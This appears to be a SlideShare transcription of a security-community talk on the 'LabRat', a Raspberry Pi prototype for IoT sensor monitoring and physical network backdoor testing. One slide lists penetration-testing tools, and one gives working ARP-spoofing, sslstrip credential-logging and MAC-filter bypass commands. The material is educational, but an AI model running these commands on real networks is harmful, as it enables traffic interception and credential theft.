SlideShare a Scribd company logo

The LabRat: Physical Backdoor Hacks and IOT Primer

n|u - The Open Security Community
n|u - The Open Security Community

The document provides information about using a Raspberry Pi device called the LabRat to perform physical penetration testing and assess Internet of Things (IoT) security. It describes how the LabRat prototype uses sensors to measure temperature, humidity, and transmit data over optical fibers. It also lists penetration testing tools preloaded on the LabRat and demonstrates arp spoofing, MAC spoofing, and packet sniffing attacks. The document aims to show how the LabRat could be used to automatically monitor equipment and send sensor data to cloud services for real-time analytics, as a proof of concept for assessing IoT security.

EducationTechnology
1 of 19
Download to read offline
The LabRat Physical Backdoor Hacks and Internet of Things (IOT) Primer Akshat Sharma, TME, Cisco Systems.
The Raspberry Pi http://www.raspberrypi.org/downloads Image Downloads and Updates http://elinux.org/RPi_Low-level_peripherals -- working with gpio http://elinux.org/RPiconfig interfacing with screens. Google’s your Best Friend
Raspberry Pi as a Physical Backdoor into your network http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html It’s a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.” -- CEO of Pwnie Express, Dave Porcello Rogue APs Mac Spoofing on wired Networks MITM attacks
Humidity Sensor CH0 CH3 CLK CS (AL) MOSI MISO IR LED - Receiver IR LED - Receiver Optical Fiber CH1 CH2 Binary Signal In Binary Signal In The LabRat Circuit Temperature Sensor Humidity Sensor Optical Fiber Tester
The LabRat- a Proof of Concept Prototype The Raspberry Pi – a 35$ Linux Computer that powers the LabRat prototype. To get more info on the Raspberry pi – visit http://www.raspberrypi.org/
The LabRat Prototype Current Setup 10 inch Capacitive Touchscreen Optical Fiber Tester Humidity Sensor Temperature Sensor Raspberry-Pi HDMi-to-LVDS converter board 10,000 mAH Lithium Polymer Battery
The LabRat Prototype LM 35 + ADS7841 Temperature Sensor LM 35 Temperature SensorADS7841 Analog to Digital Converter
The LabRat Prototype Humidity Sensor SMD + ADS7841 ADS7841 Analog to Digital Converter Humidity Sensor SMD
The LabRat Prototype Optical Fiber Tester Optical Fiber Holders Infra-red LED-Receiver Combination to transmit Messages via the Fiber
Connecting to an IOT Cloud ⁻ https://xively.com/ ⁻ Formerly Cosm, Pachube
Set up a Cosm (Now Xively) Account • Register on cosm (xively) and Add Device • You will Receive an API Key and FEED ID • Now use the old Cosm eeml library to set up Datastreams from the Raspberry Pi
Setting up the Python Script to send Data to Xively Install EEML package from github sudo apt-get install python-dev sudo apt-get install python-pip sudo easy_install -U distribute sudo pip install rpi.gpio >>>> work with Rpi GPIO pins wget -O geekman-python-eeml.tar.gz https://github.com/geekman/python- eeml/tarball/master tar zxvf geekman-python-eeml.tar.gz cd geekman-python-eeml* sudo python setup.py install Set up Python Script # source eeml package import eeml <snip> API_KEY = 'YOUR_API_KEY' FEED = YOUR_FEED_ID API_URL = '/v2/feeds/{feednum}.xml' .format(feednum = FEED)
The LabRat Prototype Online Real-Time Feed – Temperature and Humidity Visit the Real-Time Feed at https://cosm.com/feeds/89297
The LabRat Prototype Python Scripts 1) Python Script to upload the Temperature and Humidity Data to an online Cloud based feed that displays how the LabRat , in the Future, may do the same with Sensory Data at Customer Labs to provide Real-Time Analytics. 2) The same Python Script sends an email to lab-admins whenever the Temperature , humidity values exceed a pre-decided Threshold 3) Another Python Script to send messages (Binary Data) through an Optical Fiber using an Infrared LED-Receiver combination and email the data to the user. The same data may later be uploaded to an inventory management system to automatically track working equipment and its performance.
The LabRat Prototype Current List of Penetration-Testing Tools Information Gathering ------------------- wireshark tcpflow ngrep hostmap kismet btscanner sslscan sslstrip sslsniff ssldump tcptraceroute netmask tcpdump zenmap nmap arp-fingerprint dnswalk dnstracer Vulnerability Assessment ---------------------- airodump-ng sqlmap nikto svcrack Exploitation Tools ------------------ aircrack-ng airmon-ng airodump-ng aireplay-ng sqlninja exploit-db Privilege Escalation ----------------- wireshark ettercap tcpreplay tcpick packit packeth dsnniff Maintaining Access ---------------- ptunnel netcat ftp-proxt udp-tunnel proxychains dns2tcp
DEMO - Arp Spoofing using SSLstrip and arpspoof - Mac Spoofing using Airmon-ng and macchanger - Packet Sniffing using Wireshark - Other MITM attacks
Arp Spoofing and Mac-Spoofing Attacks Arp Spoofing • Set up Port Forwarding iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 echo '1' > /proc/sys/net/ipv4/ip_forward • Start Arp spoofing. Spoof the Gateway arpspoof -i wlan0 <gateway address> • Start sslstrip and log User Information (use –k option to logout users from their current sessions, forcing them to re-login) sslstrip -k -l 8080 Mac Spoofing on Wifi (How to bypass Mac Filtering) • ifconfig etho down • airmon-ng start wlan0 • iwlist wlan0 scanning • airodump-ng –c 6 -a --bssid <mac address of wireless access point> --- Gives info of connected devices • Ifconfig wlan0 down • Now use machchanger • Macchanger –m <mac of allowed devices> wlan0 • Ifconfig wlan0 up
Putting The Internet of Things into Perspective Co-incidental Cisco Plugin :p
Thank You

Recommended

Zmap talk-sec13
Zmap talk-sec13Zmap talk-sec13
Zmap talk-sec13Sergi Duró
 
Terraforming
Terraforming Terraforming
Terraforming David Przybilla
 
Firewall - Network Defense in Depth Firewalls
Firewall - Network Defense in Depth FirewallsFirewall - Network Defense in Depth Firewalls
Firewall - Network Defense in Depth Firewallsphanleson
 
Streaming join & lesson 4.
Streaming join & lesson 4.Streaming join & lesson 4.
Streaming join & lesson 4.Taewoo Kim
 
[CB19] New threats are already around you, the IPV6 attack must be understood...
[CB19] New threats are already around you, the IPV6 attack must be understood...[CB19] New threats are already around you, the IPV6 attack must be understood...
[CB19] New threats are already around you, the IPV6 attack must be understood...CODE BLUE
 
Positive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days
 
PyCon FR 2016 - Et si on recodait Google en Python ?
PyCon FR 2016 - Et si on recodait Google en Python ?PyCon FR 2016 - Et si on recodait Google en Python ?
PyCon FR 2016 - Et si on recodait Google en Python ?Sylvain Zimmer
 
Device detection, the User Agent and beyond
Device detection, the User Agent and beyondDevice detection, the User Agent and beyond
Device detection, the User Agent and beyondAndrea Trasatti
 

Recommended

Zmap talk-sec13
Zmap talk-sec13Zmap talk-sec13
Zmap talk-sec13Sergi Duró
 
Terraforming
Terraforming Terraforming
Terraforming David Przybilla
 
Firewall - Network Defense in Depth Firewalls
Firewall - Network Defense in Depth FirewallsFirewall - Network Defense in Depth Firewalls
Firewall - Network Defense in Depth Firewallsphanleson
 
Streaming join & lesson 4.
Streaming join & lesson 4.Streaming join & lesson 4.
Streaming join & lesson 4.Taewoo Kim
 
[CB19] New threats are already around you, the IPV6 attack must be understood...
[CB19] New threats are already around you, the IPV6 attack must be understood...[CB19] New threats are already around you, the IPV6 attack must be understood...
[CB19] New threats are already around you, the IPV6 attack must be understood...CODE BLUE
 
Positive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days. Pavlov. Network Infrastructure Security Assessment
Positive Hack Days. Pavlov. Network Infrastructure Security AssessmentPositive Hack Days
 
PyCon FR 2016 - Et si on recodait Google en Python ?
PyCon FR 2016 - Et si on recodait Google en Python ?PyCon FR 2016 - Et si on recodait Google en Python ?
PyCon FR 2016 - Et si on recodait Google en Python ?Sylvain Zimmer
 
Device detection, the User Agent and beyond
Device detection, the User Agent and beyondDevice detection, the User Agent and beyond
Device detection, the User Agent and beyondAndrea Trasatti
 
IoT Based Smart Surveillance and Automation
IoT Based Smart Surveillance and AutomationIoT Based Smart Surveillance and Automation
IoT Based Smart Surveillance and AutomationIRJET Journal
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposPriyanka Aash
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsRod Soto
 
AF-2599-P.docx
AF-2599-P.docxAF-2599-P.docx
AF-2599-P.docxSami Siddiqui
 
Anomaly Detection at Scale
Anomaly Detection at ScaleAnomaly Detection at Scale
Anomaly Detection at ScaleJeff Henrikson
 
Test Execution Infrastructure for IoT Quality analysis
Test Execution Infrastructure for IoT Quality analysisTest Execution Infrastructure for IoT Quality analysis
Test Execution Infrastructure for IoT Quality analysisAxel Rennoch
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
The Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatThe Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatDuo Security
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Internet census 2012
Internet census 2012Internet census 2012
Internet census 2012Giuliano Tavaroli
 
Proactive ops for container orchestration environments
Proactive ops for container orchestration environmentsProactive ops for container orchestration environments
Proactive ops for container orchestration environmentsDocker, Inc.
 
Microservices Application Tracing Standards and Simulators - Adrians at OSCON
Microservices Application Tracing Standards and Simulators - Adrians at OSCONMicroservices Application Tracing Standards and Simulators - Adrians at OSCON
Microservices Application Tracing Standards and Simulators - Adrians at OSCONAdrian Cockcroft
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Securing IoT Applications
Securing IoT Applications Securing IoT Applications
Securing IoT Applications WSO2
 
Developing Real-Time Data Pipelines with Apache Kafka
Developing Real-Time Data Pipelines with Apache KafkaDeveloping Real-Time Data Pipelines with Apache Kafka
Developing Real-Time Data Pipelines with Apache KafkaJoe Stein
 
IOT with Drupal 8 - Webinar Hyderabad Drupal Community
IOT with Drupal 8 - Webinar Hyderabad Drupal CommunityIOT with Drupal 8 - Webinar Hyderabad Drupal Community
IOT with Drupal 8 - Webinar Hyderabad Drupal CommunityPrateek Jain
 
IP For Broadcast Engineers
IP For Broadcast EngineersIP For Broadcast Engineers
IP For Broadcast EngineersKit Peters
 
ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019Alexander Master
 
Prometheus Training
Prometheus TrainingPrometheus Training
Prometheus TrainingTim Tyler
 
Using Tetration for application security and policy enforcement in multi-vend...
Using Tetration for application security and policy enforcement in multi-vend...Using Tetration for application security and policy enforcement in multi-vend...
Using Tetration for application security and policy enforcement in multi-vend...Joel W. King
 
Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)n|u - The Open Security Community
 
Osint primer
Osint primerOsint primer
Osint primern|u - The Open Security Community
 

More Related Content

Similar to The LabRat: Physical Backdoor Hacks and IOT Primer

IoT Based Smart Surveillance and Automation
IoT Based Smart Surveillance and AutomationIoT Based Smart Surveillance and Automation
IoT Based Smart Surveillance and AutomationIRJET Journal
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposPriyanka Aash
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsRod Soto
 
Anomaly Detection at Scale
Anomaly Detection at ScaleAnomaly Detection at Scale
Anomaly Detection at ScaleJeff Henrikson
 
Test Execution Infrastructure for IoT Quality analysis
Test Execution Infrastructure for IoT Quality analysisTest Execution Infrastructure for IoT Quality analysis
Test Execution Infrastructure for IoT Quality analysisAxel Rennoch
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
The Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatThe Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatDuo Security
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationOlehLevytskyi1
 
Proactive ops for container orchestration environments
Proactive ops for container orchestration environmentsProactive ops for container orchestration environments
Proactive ops for container orchestration environmentsDocker, Inc.
 
Microservices Application Tracing Standards and Simulators - Adrians at OSCON
Microservices Application Tracing Standards and Simulators - Adrians at OSCONMicroservices Application Tracing Standards and Simulators - Adrians at OSCON
Microservices Application Tracing Standards and Simulators - Adrians at OSCONAdrian Cockcroft
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rulesFreddy Buenaño
 
Securing IoT Applications
Securing IoT Applications Securing IoT Applications
Securing IoT Applications WSO2
 
Developing Real-Time Data Pipelines with Apache Kafka
Developing Real-Time Data Pipelines with Apache KafkaDeveloping Real-Time Data Pipelines with Apache Kafka
Developing Real-Time Data Pipelines with Apache KafkaJoe Stein
 
IOT with Drupal 8 - Webinar Hyderabad Drupal Community
IOT with Drupal 8 - Webinar Hyderabad Drupal CommunityIOT with Drupal 8 - Webinar Hyderabad Drupal Community
IOT with Drupal 8 - Webinar Hyderabad Drupal CommunityPrateek Jain
 
IP For Broadcast Engineers
IP For Broadcast EngineersIP For Broadcast Engineers
IP For Broadcast EngineersKit Peters
 
ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019Alexander Master
 
Prometheus Training
Prometheus TrainingPrometheus Training
Prometheus TrainingTim Tyler
 
Using Tetration for application security and policy enforcement in multi-vend...
Using Tetration for application security and policy enforcement in multi-vend...Using Tetration for application security and policy enforcement in multi-vend...
Using Tetration for application security and policy enforcement in multi-vend...Joel W. King
 

Similar to The LabRat: Physical Backdoor Hacks and IOT Primer (20)

IoT Based Smart Surveillance and Automation
IoT Based Smart Surveillance and AutomationIoT Based Smart Surveillance and Automation
IoT Based Smart Surveillance and Automation
 
Automated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gposAutomated prevention of ransomware with machine learning and gpos
Automated prevention of ransomware with machine learning and gpos
 
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOsSPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
SPO2-T11_Automated-Prevention-of-Ransomware-with-Machine-Learning-and-GPOs
 
AF-2599-P.docx
AF-2599-P.docxAF-2599-P.docx
AF-2599-P.docx
 
Anomaly Detection at Scale
Anomaly Detection at ScaleAnomaly Detection at Scale
Anomaly Detection at Scale
 
Test Execution Infrastructure for IoT Quality analysis
Test Execution Infrastructure for IoT Quality analysisTest Execution Infrastructure for IoT Quality analysis
Test Execution Infrastructure for IoT Quality analysis
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
The Internet of Things: We've Got to Chat
The Internet of Things: We've Got to ChatThe Internet of Things: We've Got to Chat
The Internet of Things: We've Got to Chat
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
Internet census 2012
Internet census 2012Internet census 2012
Internet census 2012
 
Proactive ops for container orchestration environments
Proactive ops for container orchestration environmentsProactive ops for container orchestration environments
Proactive ops for container orchestration environments
 
Microservices Application Tracing Standards and Simulators - Adrians at OSCON
Microservices Application Tracing Standards and Simulators - Adrians at OSCONMicroservices Application Tracing Standards and Simulators - Adrians at OSCON
Microservices Application Tracing Standards and Simulators - Adrians at OSCON
 
26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules26.1.7 lab snort and firewall rules
26.1.7 lab snort and firewall rules
 
Securing IoT Applications
Securing IoT Applications Securing IoT Applications
Securing IoT Applications
 
Developing Real-Time Data Pipelines with Apache Kafka
Developing Real-Time Data Pipelines with Apache KafkaDeveloping Real-Time Data Pipelines with Apache Kafka
Developing Real-Time Data Pipelines with Apache Kafka
 
IOT with Drupal 8 - Webinar Hyderabad Drupal Community
IOT with Drupal 8 - Webinar Hyderabad Drupal CommunityIOT with Drupal 8 - Webinar Hyderabad Drupal Community
IOT with Drupal 8 - Webinar Hyderabad Drupal Community
 
IP For Broadcast Engineers
IP For Broadcast EngineersIP For Broadcast Engineers
IP For Broadcast Engineers
 
ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019ENPM808 Independent Study Final Report - amaster 2019
ENPM808 Independent Study Final Report - amaster 2019
 
Prometheus Training
Prometheus TrainingPrometheus Training
Prometheus Training
 
Using Tetration for application security and policy enforcement in multi-vend...
Using Tetration for application security and policy enforcement in multi-vend...Using Tetration for application security and policy enforcement in multi-vend...
Using Tetration for application security and policy enforcement in multi-vend...
 

More from n|u - The Open Security Community

Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...n|u - The Open Security Community
 

More from n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Recently uploaded

Micromeritics - Fundamental and Derived Properties of Powders
Micromeritics - Fundamental and Derived Properties of PowdersMicromeritics - Fundamental and Derived Properties of Powders
Micromeritics - Fundamental and Derived Properties of PowdersChitralekhaTherkar
 
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxContemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxRoyAbrique
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxNirmalaLoungPoorunde1
 
Science 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsScience 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsKarinaGenton
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon AUnboundStockton
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformChameera Dedduwage
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactdawncurless
 
PSYCHIATRIC History collection FORMAT.pptx
PSYCHIATRIC History collection FORMAT.pptxPSYCHIATRIC History collection FORMAT.pptx
PSYCHIATRIC History collection FORMAT.pptxPoojaSen20
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxpboyjonauth
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentInMediaRes1
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3JemimahLaneBuaron
 
_Math 4-Q4 Week 5.pptx Steps in Collecting Data
_Math 4-Q4 Week 5.pptx Steps in Collecting Data_Math 4-Q4 Week 5.pptx Steps in Collecting Data
_Math 4-Q4 Week 5.pptx Steps in Collecting DataJhengPantaleon
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesFatimaKhan178732
 
Solving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxSolving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxOH TEIK BIN
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionSafetyChain Software
 

Recently uploaded (20)

Micromeritics - Fundamental and Derived Properties of Powders
Micromeritics - Fundamental and Derived Properties of PowdersMicromeritics - Fundamental and Derived Properties of Powders
Micromeritics - Fundamental and Derived Properties of Powders
 
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptxContemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
Contemporary philippine arts from the regions_PPT_Module_12 [Autosaved] (1).pptx
 
Employee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptxEmployee wellbeing at the workplace.pptx
Employee wellbeing at the workplace.pptx
 
Staff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSDStaff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSD
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
Science 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its CharacteristicsScience 7 - LAND and SEA BREEZE and its Characteristics
Science 7 - LAND and SEA BREEZE and its Characteristics
 
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdfTataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
 
Crayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon ACrayon Activity Handout For the Crayon A
Crayon Activity Handout For the Crayon A
 
A Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy ReformA Critique of the Proposed National Education Policy Reform
A Critique of the Proposed National Education Policy Reform
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
Accessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impactAccessible design: Minimum effort, maximum impact
Accessible design: Minimum effort, maximum impact
 
PSYCHIATRIC History collection FORMAT.pptx
PSYCHIATRIC History collection FORMAT.pptxPSYCHIATRIC History collection FORMAT.pptx
PSYCHIATRIC History collection FORMAT.pptx
 
Introduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptxIntroduction to AI in Higher Education_draft.pptx
Introduction to AI in Higher Education_draft.pptx
 
Alper Gobel In Media Res Media Component
Alper Gobel In Media Res Media ComponentAlper Gobel In Media Res Media Component
Alper Gobel In Media Res Media Component
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3
 
_Math 4-Q4 Week 5.pptx Steps in Collecting Data
_Math 4-Q4 Week 5.pptx Steps in Collecting Data_Math 4-Q4 Week 5.pptx Steps in Collecting Data
_Math 4-Q4 Week 5.pptx Steps in Collecting Data
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and Actinides
 
Solving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptxSolving Puzzles Benefits Everyone (English).pptx
Solving Puzzles Benefits Everyone (English).pptx
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory Inspection
 

The LabRat: Physical Backdoor Hacks and IOT Primer

  • 1. The LabRat Physical Backdoor Hacks and Internet of Things (IOT) Primer Akshat Sharma, TME, Cisco Systems.
  • 2. The Raspberry Pi http://www.raspberrypi.org/downloads Image Downloads and Updates http://elinux.org/RPi_Low-level_peripherals -- working with gpio http://elinux.org/RPiconfig interfacing with screens. Google’s your Best Friend
  • 3. Raspberry Pi as a Physical Backdoor into your network http://securityaffairs.co/wordpress/15471/hacking/raspberry-pi-as-physical-backdoor.html It’s a device “you can just plug in and do a full-scale penetration test from start to finish,” Porcello says. “The enterprise can use stuff like this to do testing more often and more cheaply than they’re doing it right now.” -- CEO of Pwnie Express, Dave Porcello Rogue APs Mac Spoofing on wired Networks MITM attacks
  • 4. Humidity Sensor CH0 CH3 CLK CS (AL) MOSI MISO IR LED - Receiver IR LED - Receiver Optical Fiber CH1 CH2 Binary Signal In Binary Signal In The LabRat Circuit Temperature Sensor Humidity Sensor Optical Fiber Tester
  • 5. The LabRat- a Proof of Concept Prototype The Raspberry Pi – a 35$ Linux Computer that powers the LabRat prototype. To get more info on the Raspberry pi – visit http://www.raspberrypi.org/
  • 6. The LabRat Prototype Current Setup 10 inch Capacitive Touchscreen Optical Fiber Tester Humidity Sensor Temperature Sensor Raspberry-Pi HDMi-to-LVDS converter board 10,000 mAH Lithium Polymer Battery
  • 7. The LabRat Prototype LM 35 + ADS7841 Temperature Sensor LM 35 Temperature SensorADS7841 Analog to Digital Converter
  • 8. The LabRat Prototype Humidity Sensor SMD + ADS7841 ADS7841 Analog to Digital Converter Humidity Sensor SMD
  • 9. The LabRat Prototype Optical Fiber Tester Optical Fiber Holders Infra-red LED-Receiver Combination to transmit Messages via the Fiber
  • 10. Connecting to an IOT Cloud ⁻ https://xively.com/ ⁻ Formerly Cosm, Pachube
